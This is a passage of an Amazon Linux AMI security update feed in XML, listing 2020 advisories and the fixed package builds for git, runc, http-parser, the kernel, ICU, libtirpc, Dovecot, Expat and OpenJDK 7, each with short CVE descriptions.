arch="noarch"><filename>Packages/git-p4-2.14.6-1.62.amzn1.noarch.rpm</filename></package><package name="git-all" version="2.14.6" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.14.6-1.62.amzn1.noarch.rpm</filename></package><package name="git-bzr" version="2.14.6" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.14.6-1.62.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.14.6" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.14.6-1.62.amzn1.x86_64.rpm</filename></package><package name="perl-Git-SVN" version="2.14.6" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.14.6-1.62.amzn1.noarch.rpm</filename></package><package name="git" version="2.14.6" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.14.6-1.62.amzn1.x86_64.rpm</filename></package><package name="git-cvs" version="2.14.6" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.14.6-1.62.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.14.6" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.14.6-1.62.amzn1.x86_64.rpm</filename></package><package name="git-svn" version="2.14.6" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.14.6-1.62.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.14.6" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.14.6-1.62.amzn1.i686.rpm</filename></package><package name="git" version="2.14.6" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.14.6-1.62.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.14.6" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.14.6-1.62.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1358</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1358: medium priority package update for runc</title><issued date="2020-04-20 18:58:00" /><updated date="2020-04-23 23:06:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-19921:
runc through 1.0.0-rc9 has Incorrect Access Control leading to Escalation of Privileges, related to libcontainer/rootfs_linux.go. To exploit this, an attacker must be able to spawn two containers with custom volume-mount configurations, and be able to run custom images. (This vulnerability does not affect Docker due to an implementation detail that happens to block the attack.)
1796107: CVE-2019-19921 runc: volume mount race condition with shared mounts leads to information leak/integrity manipulation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19921" title="" id="CVE-2019-19921" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="runc" version="1.0.0" release="0.1.20200204.gitdc9208a.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/runc-1.0.0-0.1.20200204.gitdc9208a.1.amzn1.x86_64.rpm</filename></package><package name="runc-debuginfo" version="1.0.0" release="0.1.20200204.gitdc9208a.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/runc-debuginfo-1.0.0-0.1.20200204.gitdc9208a.1.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1359</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1359: important priority package update for http-parser</title><issued date="2020-04-20 19:21:00" /><updated date="2020-04-23 23:03:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-15605:
HTTP request smuggling in Node.js 10, 12, and 13 causes malicious payload delivery when transfer-encoding is malformed
1800364: CVE-2019-15605 nodejs: HTTP request smuggling using malformed Transfer-Encoding header
CVE-2018-7159:
The HTTP parser in all current versions of Node.js ignores spaces in the `Content-Length` header, allowing input such as `Content-Length: 1 2` to be interpreted as having a value of `12`. The HTTP specification does not allow for spaces in the `Content-Length` value and the Node.js HTTP parser has been brought into line on this particular difference. The security risk of this flaw to Node.js users is considered to be VERY LOW as it is difficult, and may be impossible, to craft an attack that makes use of this flaw in a way that could not already be achieved by supplying an incorrect value for `Content-Length`. Vulnerabilities may exist in user-code that make incorrect assumptions about the potential accuracy of this value compared to the actual length of the data supplied. Node.js users crafting lower-level HTTP utilities are advised to re-check the length of any input supplied after parsing is complete.
It was found that the http module from Node.js could accept incorrect Content-Length values, containing spaces within the value, in HTTP headers. A specially crafted client could use this flaw to possibly confuse the script, causing unspecified behavior.
99999:
CVE-2018-7159 nodejs: HTTP parser allowed for spaces inside Content-Length header values
1561981: CVE-2018-7159 nodejs: HTTP parser allowed for spaces inside Content-Length header values
CVE-2018-12121:
Node.js: All versions prior to Node.js 6.15.0, 8.14.0, 10.14.0 and 11.3.0: Denial of Service with large HTTP headers: By using a combination of many requests with maximum sized headers (almost 80 KB per connection), and carefully timed completion of the headers, it is possible to cause the HTTP server to abort from heap allocation failure. Attack potential is mitigated by the use of a load balancer or other proxy layer.
99999:
CVE-2018-12121 nodejs: Denial of Service with large HTTP headers
1661002: CVE-2018-12121 nodejs: Denial of Service with large HTTP headers
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12121" title="" id="CVE-2018-12121" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7159" title="" id="CVE-2018-7159" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15605" title="" id="CVE-2019-15605" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="http-parser" version="2.9.3" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/http-parser-2.9.3-1.2.amzn1.x86_64.rpm</filename></package><package name="http-parser-debuginfo" version="2.9.3" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/http-parser-debuginfo-2.9.3-1.2.amzn1.x86_64.rpm</filename></package><package name="http-parser-devel" version="2.9.3" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/http-parser-devel-2.9.3-1.2.amzn1.x86_64.rpm</filename></package><package name="http-parser-debuginfo" version="2.9.3" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/http-parser-debuginfo-2.9.3-1.2.amzn1.i686.rpm</filename></package><package name="http-parser-devel" version="2.9.3" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/http-parser-devel-2.9.3-1.2.amzn1.i686.rpm</filename></package><package name="http-parser" version="2.9.3" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/http-parser-2.9.3-1.2.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1360</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1360: medium priority package update for kernel</title><issued date="2020-04-20 19:25:00" /><updated date="2023-11-29 23:18:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8648:
A use-after-free flaw was found in the Linux kernel console driver when using the copy-paste buffer. This flaw allows a local user to crash the system.
CVE-2020-27418:
A Use After Free vulnerability in Fedora Linux kernel 5.9.0-rc9 allows attackers to obatin sensitive information via vgacon_invert_region() function.
CVE-2020-2732:
A flaw was found in the way KVM hypervisor handled instruction emulation for the L2 guest when nested(=1) virtualization is enabled. In the instruction emulation, the L2 guest could trick the L0 hypervisor into accessing sensitive bits of the L1 hypervisor. An L2 guest could use this flaw to potentially access information of the L1 hypervisor.
CVE-2020-10942:
A stack buffer overflow issue was found in the get_raw_socket() routine of the Host kernel accelerator for virtio net (vhost-net) driver. It could occur while doing an ictol(VHOST_NET_SET_BACKEND) call, and retrieving socket name in a kernel stack variable via get_raw_socket(). A user able to perform ioctl(2) calls on the '/dev/vhost-net' device may use this flaw to crash the kernel resulting in DoS issue.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10942" title="" id="CVE-2020-10942" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2732" title="" id="CVE-2020-2732" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27418" title="" id="CVE-2020-27418" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8648" title="" id="CVE-2020-8648" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.14.173" release="106.229.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.173-106.229.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.173" release="106.229.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.173-106.229.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.173" release="106.229.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.173-106.229.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.173" release="106.229.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.173-106.229.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.173" release="106.229.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.173-106.229.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.173" release="106.229.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.173-106.229.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.173" release="106.229.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.173-106.229.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.173" release="106.229.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.173-106.229.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.173" release="106.229.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.173-106.229.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.173" release="106.229.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.173-106.229.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.173" release="106.229.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.173-106.229.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.173" release="106.229.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.173-106.229.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.173" release="106.229.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.173-106.229.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.173" release="106.229.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.173-106.229.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.173" release="106.229.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.173-106.229.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.173" release="106.229.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.173-106.229.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.173" release="106.229.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.173-106.229.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.173" release="106.229.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.173-106.229.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.173" release="106.229.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.173-106.229.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.173" release="106.229.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.173-106.229.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1361</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1361: medium priority package update for icu</title><issued date="2020-04-20 20:34:00" /><updated date="2020-04-23 23:05:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-10531:
An issue was discovered in International Components for Unicode (ICU) for C/C++ through 66.1. An integer overflow, leading to a heap-based buffer overflow, exists in the UnicodeString::doAppend() function in common/unistr.cpp.
1807349: CVE-2020-10531 ICU: Integer overflow in UnicodeString::doAppend()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10531" title="" id="CVE-2020-10531" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libicu" version="50.2" release="4.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/libicu-50.2-4.0.amzn1.x86_64.rpm</filename></package><package name="icu" version="50.2" release="4.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/icu-50.2-4.0.amzn1.x86_64.rpm</filename></package><package name="libicu-doc" version="50.2" release="4.0.amzn1" epoch="0" arch="noarch"><filename>Packages/libicu-doc-50.2-4.0.amzn1.noarch.rpm</filename></package><package name="icu-debuginfo" version="50.2" release="4.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/icu-debuginfo-50.2-4.0.amzn1.x86_64.rpm</filename></package><package name="libicu-devel" version="50.2" release="4.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/libicu-devel-50.2-4.0.amzn1.x86_64.rpm</filename></package><package name="icu-debuginfo" version="50.2" release="4.0.amzn1" epoch="0" arch="i686"><filename>Packages/icu-debuginfo-50.2-4.0.amzn1.i686.rpm</filename></package><package name="libicu-devel" version="50.2" release="4.0.amzn1" epoch="0" arch="i686"><filename>Packages/libicu-devel-50.2-4.0.amzn1.i686.rpm</filename></package><package name="libicu" version="50.2" release="4.0.amzn1" epoch="0" arch="i686"><filename>Packages/libicu-50.2-4.0.amzn1.i686.rpm</filename></package><package name="icu" version="50.2" release="4.0.amzn1" epoch="0" arch="i686"><filename>Packages/icu-50.2-4.0.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1362</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1362: low priority package update for libtirpc</title><issued date="2020-04-20 20:38:00" /><updated date="2020-04-23 23:05:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-14622:
A null-pointer dereference vulnerability was found in libtirpc before version 0.3.3-rc3. The return value of makefd_xprt() was not checked in all instances, which could lead to a crash when the server exhausted the maximum number of available file descriptors. A remote attacker could cause an rpc-based application to crash by flooding it with new connections.
1620293: CVE-2018-14622 libtirpc: Segmentation fault in makefd_xprt return value in svc_vc.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14622" title="" id="CVE-2018-14622" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtirpc" version="0.2.4" release="0.16.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtirpc-0.2.4-0.16.15.amzn1.x86_64.rpm</filename></package><package name="libtirpc-devel" version="0.2.4" release="0.16.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtirpc-devel-0.2.4-0.16.15.amzn1.x86_64.rpm</filename></package><package name="libtirpc-debuginfo" version="0.2.4" release="0.16.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtirpc-debuginfo-0.2.4-0.16.15.amzn1.x86_64.rpm</filename></package><package name="libtirpc" version="0.2.4" release="0.16.15.amzn1" epoch="0" arch="i686"><filename>Packages/libtirpc-0.2.4-0.16.15.amzn1.i686.rpm</filename></package><package name="libtirpc-debuginfo" version="0.2.4" release="0.16.15.amzn1" epoch="0" arch="i686"><filename>Packages/libtirpc-debuginfo-0.2.4-0.16.15.amzn1.i686.rpm</filename></package><package name="libtirpc-devel" version="0.2.4" release="0.16.15.amzn1" epoch="0" arch="i686"><filename>Packages/libtirpc-devel-0.2.4-0.16.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1363</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1363: medium priority package update for dovecot</title><issued date="2020-05-08 19:50:00" /><updated date="2020-05-14 02:28:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-7524:
In Dovecot before 2.2.36.3 and 2.3.x before 2.3.5.1, a local attacker can cause a buffer overflow in the indexer-worker process, which can be used to elevate to root. This occurs because of missing checks in the fts and pop3-uidl components.
1696152: CVE-2019-7524 dovecot: Buffer overflow in indexer-worker process results in privilege escalation
CVE-2019-3814:
It was discovered that Dovecot before versions 2.2.36.1 and 2.3.4.1 incorrectly handled client certificates. A remote attacker in possession of a valid certificate with an empty username field could possibly use this issue to impersonate other users.
1673415: CVE-2019-3814 dovecot: Improper certificate validation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3814" title="" id="CVE-2019-3814" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7524" title="" id="CVE-2019-7524" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dovecot-pigeonhole" version="2.2.36" release="6.19.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-pigeonhole-2.2.36-6.19.amzn1.x86_64.rpm</filename></package><package name="dovecot-mysql" version="2.2.36" release="6.19.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-mysql-2.2.36-6.19.amzn1.x86_64.rpm</filename></package><package name="dovecot-debuginfo" version="2.2.36" release="6.19.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-debuginfo-2.2.36-6.19.amzn1.x86_64.rpm</filename></package><package name="dovecot" version="2.2.36" release="6.19.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-2.2.36-6.19.amzn1.x86_64.rpm</filename></package><package name="dovecot-pgsql" version="2.2.36" release="6.19.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-pgsql-2.2.36-6.19.amzn1.x86_64.rpm</filename></package><package name="dovecot-devel" version="2.2.36" release="6.19.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-devel-2.2.36-6.19.amzn1.x86_64.rpm</filename></package><package name="dovecot" version="2.2.36" release="6.19.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-2.2.36-6.19.amzn1.i686.rpm</filename></package><package name="dovecot-devel" version="2.2.36" release="6.19.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-devel-2.2.36-6.19.amzn1.i686.rpm</filename></package><package name="dovecot-pgsql" version="2.2.36" release="6.19.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-pgsql-2.2.36-6.19.amzn1.i686.rpm</filename></package><package name="dovecot-pigeonhole" version="2.2.36" release="6.19.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-pigeonhole-2.2.36-6.19.amzn1.i686.rpm</filename></package><package name="dovecot-debuginfo" version="2.2.36" release="6.19.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-debuginfo-2.2.36-6.19.amzn1.i686.rpm</filename></package><package name="dovecot-mysql" version="2.2.36" release="6.19.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-mysql-2.2.36-6.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1364</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1364: medium priority package update for expat</title><issued date="2020-05-11 20:41:00" /><updated date="2020-05-14 02:27:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2716:
Buffer overflow in the XML parser in Mozilla Firefox before 38.0, Firefox ESR 31.x before 31.7, and Thunderbird before 31.7 allows remote attackers to execute arbitrary code by providing a large amount of compressed XML data, a related issue to CVE-2015-1283.
99999:
CVE-2015-2716 expat: Integer overflow leading to buffer overflow in XML_GetBuffer()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2716" title="" id="CVE-2015-2716" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="expat-debuginfo" version="2.1.0" release="11.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-debuginfo-2.1.0-11.22.amzn1.x86_64.rpm</filename></package><package name="expat-devel" version="2.1.0" release="11.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-devel-2.1.0-11.22.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="11.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-2.1.0-11.22.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="11.22.amzn1" epoch="0" arch="i686"><filename>Packages/expat-2.1.0-11.22.amzn1.i686.rpm</filename></package><package name="expat-devel" version="2.1.0" release="11.22.amzn1" epoch="0" arch="i686"><filename>Packages/expat-devel-2.1.0-11.22.amzn1.i686.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="11.22.amzn1" epoch="0" arch="i686"><filename>Packages/expat-debuginfo-2.1.0-11.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1365</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1365: important priority package update for java-1.7.0-openjdk</title><issued date="2020-05-08 20:10:00" /><updated date="2020-05-14 02:26:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-2830:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Concurrency). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2020-2830 OpenJDK: Regular expression DoS in Scanner (Concurrency, 8236201)
1823542: CVE-2020-2830 OpenJDK: Regular expression DoS in Scanner (Concurrency, 8236201)
CVE-2020-2805:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
No description is available for this CVE.
99999:
CVE-2020-2805 OpenJDK: Incorrect type checks in MethodType.readObject() (Libraries, 8235274)
1823844: CVE-2020-2805 OpenJDK: Incorrect type checks in MethodType.readObject() (Libraries, 8235274)
CVE-2020-2803:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
A flaw was found in the boundary checks in the java.nio buffer classes in the Libraries component of OpenJDK, where it is bypassed in certain cases. This flaw allows an untrusted Java application or applet o bypass Java sandbox restrictions.
99999:
CVE-2020-2803 OpenJDK: Incorrect bounds checks in NIO Buffers (Libraries, 8234841)
1823694: CVE-2020-2803 OpenJDK: Incorrect bounds checks in NIO Buffers (Libraries, 8234841)
CVE-2020-2800:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Lightweight HTTP Server). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.0 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N).
No description is available for this CVE.
99999:
CVE-2020-2800 OpenJDK: CRLF injection into HTTP headers in HttpServer (Lightweight HTTP Server, 8234825)
1823527: CVE-2020-2800 OpenJDK: CRLF injection into HTTP headers in HttpServer (Lightweight HTTP Server, 8234825)
CVE-2020-2781:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JSSE). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2020-2781 OpenJDK: Re-use of single TLS sessions for new connections (JSSE, 8234408)
1823960: CVE-2020-2781 OpenJDK: Re-use of single TLS session for new connections (JSSE, 8234408)
CVE-2020-2773:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Security). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2020-2773 OpenJDK: Unexpected exceptions raised by DOMKeyInfoFactory and DOMXMLSignatureFactory (Security, 8231415)
1823224: CVE-2020-2773 OpenJDK: Unexpected exceptions raised by DOMKeyInfoFactory and DOMXMLSignatureFactory (Security, 8231415)
CVE-2020-2757:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2020-2757 OpenJDK: Uncaught InstantiationError exception in ObjectStreamClass (Serialization, 8224549)
1823216: CVE-2020-2757 OpenJDK: Uncaught InstantiationError exception in ObjectStreamClass (Serialization, 8224549)
CVE-2020-2756:
